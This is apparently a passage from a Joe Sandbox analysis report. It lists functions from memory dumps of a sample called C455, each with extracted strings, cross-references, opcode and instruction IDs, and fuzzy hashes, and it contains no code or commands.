Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96

Function 00A0C921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

. , xrefs: 00A0C9CE

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
Instruction ID: 5aae080a30551e1c963a09e3ebbbb9b8416ffe31786698fd5c4bdd766e7cb9f9
Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
Instruction Fuzzy Hash: 76C12AB5D00615CBCB24CF29C8516BBB7B1FF95320F19825DD895AB7D0E734A941CB90

Function 00A15BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 00A15CCC

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: 167H
API String ID: 0-2704650348
Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
Instruction ID: 9eb75ad3ef580723caf202627c15b144cc87d473a2b1aa1d86005144195fd369
Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
Instruction Fuzzy Hash: 0ED14672E087548BD718CF3888816EBB7A2EFD5314F19862CE9958B3C1D735DE468782

Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 00425A65

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 167H
API String ID: 2994545307-2704650348
Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A

Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

. , xrefs: 0041C767

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94

Function 00A11F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 00A11FE4

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
Instruction ID: 3140aba5d0f16ecf6d7d1ff80d4cab5542a6873f4b369ac247bbfaa6f2cd5e28
Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
Instruction Fuzzy Hash: 6CA126B26042105BDB18DB28CC927FBB3E5EF91320F09862CE9969B291E734DD55C352

Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 00421D7D

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A

Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

. , xrefs: 0041CBA7

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4

Function 00A0C528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

de, xrefs: 00A0C5B4

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: de
API String ID: 0-2106599819
Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Instruction ID: 4231034f7488f9145023b98638c85787ace5b4389f6127544f1a24d33bfd7a70
Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Instruction Fuzzy Hash: 9F9141719083048AC324DF28D89266BB7F2EFD5324F189A2CE4D64B3D1F7799909C792

Function 00A0D4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 00A0D5A2

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 8c5aa6b5a5b2fe2e388992ca06d89cc462c2ef20750d480a456fbd2899bcd495
Instruction ID: f0f9d7d1a4bb850abf4acc4207b43e07f3481d83b29eef96e1c510273cfc63fe
Opcode Fuzzy Hash: 8c5aa6b5a5b2fe2e388992ca06d89cc462c2ef20750d480a456fbd2899bcd495
Instruction Fuzzy Hash: A1A15873A082655FC725CF68DC8066AB7E1AFC5320F19823DECA9973D1D6319C0697C1

Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 0041D33B

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1

Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

RpB, xrefs: 00426FEB

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: RpB
API String ID: 0-664042118
Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A

Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

d1, xrefs: 004254D0

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: d1
API String ID: 0-4211392460
Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A

Function 00A077E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

c$, xrefs: 00A0796E

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
Instruction ID: 8a579689cc7cbd88947a31dc360dd109a5637dad473e793d7946f42db69ceed4
Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
Instruction Fuzzy Hash: 299199B0504741CFD7648F25C4A4B67BBB2FF46318F19968CC4864FBA1E379A886CB94

Function 00A2D557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 00A2D57C

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
Instruction ID: 83f0e37475f4082106277fde8a09e197ef2d32f07c0621cbf094f4f86049ba45
Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
Instruction Fuzzy Hash: 4E81AE746082119FD714DF2CD981A6BB7E2EF99314F19863CE5848B3A2EB31EC41CB42

Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043D315

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46

Function 00A1A637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 00A1A835

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: f20b419b06bf251561463c60a5159db1825a41bb07e594826cdf2ca1f469a4c9
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 0C710432B093558BD714CF29C98039EBBE2ABE5710F29856DE4A89B391D334DD858B43

Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042A5CE

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B

Function 00A2A9DE Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

w, xrefs: 00A2AAD0

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-2991200456
Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction ID: c2529830d13faa66df5ae24007ac22e8da4efcd1d695ba3ef24e8f9dea464536
Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction Fuzzy Hash: B24105B6E116618FD704DFA4CD855ABBB72FF84315B0AC1A8C8847B31AD77869078BD0

Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

w, xrefs: 0043A869

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-2991200456
Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0

Function 00A2CFC7 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

ihgf, xrefs: 00A2CFEC

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
Instruction ID: 3ff8925c19186f9b8339f0c6933488be9d209fb474ab718f00e89b93f4c7eb21
Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
Instruction Fuzzy Hash: 1131E434308310ABE7209F2CEC91B3FB7A5EB96B14F24493CE586972A2D661EC51C656

Function 00A2D0F7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

ihgf, xrefs: 00A2D11C

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
Instruction ID: b3190dc529a5dd417af6b6ed5a318b0f4a01dbd08f7cfe6ef0f1db4424938111
Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
Instruction Fuzzy Hash: EF31E434304311AFE6108B28AC81B7BF7A5EB96714F244A3CE584A7692D630EC60C656

Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CEB5

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
Opcode Fuzzy Hash: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A

Function 00A16739 Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

dB, xrefs: 00A16739

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: dB
API String ID: 0-2104629891
Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C

Function 004143C2 Relevance: .8, Instructions: 805COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
Opcode Fuzzy Hash: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A

Function 0043C280 Relevance: .4, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46

Function 0043C1F0 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46

Function 004166A0 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95

Function 009F9967 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
Instruction ID: 7c6fe6b1795ffef177d098881fbea23080fc9f7dd018316864db497dd043be52
Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
Instruction Fuzzy Hash: E7C102B160C3848BD318DF25C850BBBBBE6EBD2304F14492DE5D68B292DB35C50ACB56

Function 00409700 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56

Function 00A0EC17 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
Instruction ID: f5bc7ca62095a050f1081b2d4bdbcbfd60b494122fa1e9ba9d80bd4b29847bfa
Opcode Fuzzy Hash: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
Instruction Fuzzy Hash: ED6138316083949FD725CF28C85192E7BE1AF96310F4886ADE8E48B3D2D671D805E792

Function 0041E9B0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796

Function 004369A0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
Opcode Fuzzy Hash: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
